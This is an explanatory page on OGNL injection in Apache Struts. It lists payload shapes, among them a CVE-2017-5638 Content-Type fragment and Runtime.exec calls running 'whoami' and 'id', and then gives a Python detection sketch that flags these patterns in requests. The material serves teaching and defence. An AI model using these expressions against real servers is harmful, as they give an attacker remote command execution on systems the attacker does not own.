OGNL injection is a code injection vulnerability affecting applications that use the Object-Graph Navigation Language (OGNL), particularly Apache Struts. An attacker who can inject OGNL expressions can access and manipulate Java objects, which can lead to remote code execution.
OGNL is an expression language for getting and setting properties of Java objects. When user input is evaluated as an OGNL expression without proper sanitization, an attacker can traverse the object graph and invoke arbitrary methods.
```text
# Struts 2 action parameter pollution
http://target/action?name=${expression}

# Content-Type manipulation (CVE-2017-5638)
Content-Type: %{#context['com.opensymphony.xwork2.dispatcher.HttpServletResponse']...}

# Access static methods
@java.lang.Runtime@getRuntime().exec('whoami')

# Execute commands via a chained Runtime.exec call
(#rt=@java.lang.Runtime@getRuntime()).(#rt.exec('id'))

# Struts 2 classic payload
%{(#_='multipart/form-data').(#dm=@ognl.OgnlContext@DEFAULT_MEMBER_ACCESS)...}
```
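A detection sketch for the expression shapes listed above, as an added example that is not part of the original page: it percent-decodes the request target and each header value, then reports which OGNL indicators appear. The function names, the `INDICATORS` table, the flagging rule and the sample requests (including the host `app.example`) are assumptions made for illustration.

```python
import re
from urllib.parse import unquote

# Indicators taken from the expression shapes listed on this page.
INDICATORS = {
    "expression_delimiter": re.compile(r"[%$]\{"),
    "static_member_access": re.compile(r"@[A-Za-z_][\w.$]*@\w+"),
    "context_variable": re.compile(r"#(?:context|_memberAccess)\b|#\w+\s*="),
    "member_access_override": re.compile(r"DEFAULT_MEMBER_ACCESS"),
}

def fully_decode(value, max_rounds=3):
    """Percent-decode repeatedly so double-encoded input is still inspected."""
    for _ in range(max_rounds):
        decoded = unquote(value)
        if decoded == value:
            break
        value = decoded
    return value

def ognl_indicators(value):
    """Return the sorted names of OGNL indicators present in one field."""
    text = fully_decode(value)
    return sorted(name for name, rx in INDICATORS.items() if rx.search(text))

def scan_request(raw):
    """Map each suspicious field (request target or header) to its indicators."""
    head = raw.split("\r\n\r\n", 1)[0].split("\r\n")
    fields = {"target": head[0].split(" ")[1]}
    for line in head[1:]:
        name, _, value = line.partition(":")
        fields[name.strip().lower()] = value.strip()
    hits = {f: ognl_indicators(v) for f, v in fields.items()}
    # A lone "${" is noisy; require two indicators together, or static
    # member access, which ordinary form data should never contain.
    return {f: h for f, h in hits.items()
            if "static_member_access" in h or len(h) >= 2}

# Constructed sample requests (not captured traffic).
BENIGN = ("GET /action?name=alice HTTP/1.1\r\nHost: app.example\r\n"
          "Content-Type: text/plain\r\n\r\n")
ENCODED_PARAM = ("GET /action?name=%2524%257B%2523context%257D HTTP/1.1\r\n"
                 "Host: app.example\r\n\r\n")
HEADER = ("POST /upload.action HTTP/1.1\r\nHost: app.example\r\n"
          "Content-Type: %{(#_='multipart/form-data')."
          "(#dm=@ognl.OgnlContext@DEFAULT_MEMBER_ACCESS)}\r\n\r\n")

if __name__ == "__main__":
    for sample in (BENIGN, ENCODED_PARAM, HEADER):
        print(scan_request(sample))
```

Pattern matching of this kind is a triage aid for logs and proxies; it does not replace keeping user input out of OGNL evaluation in the application itself.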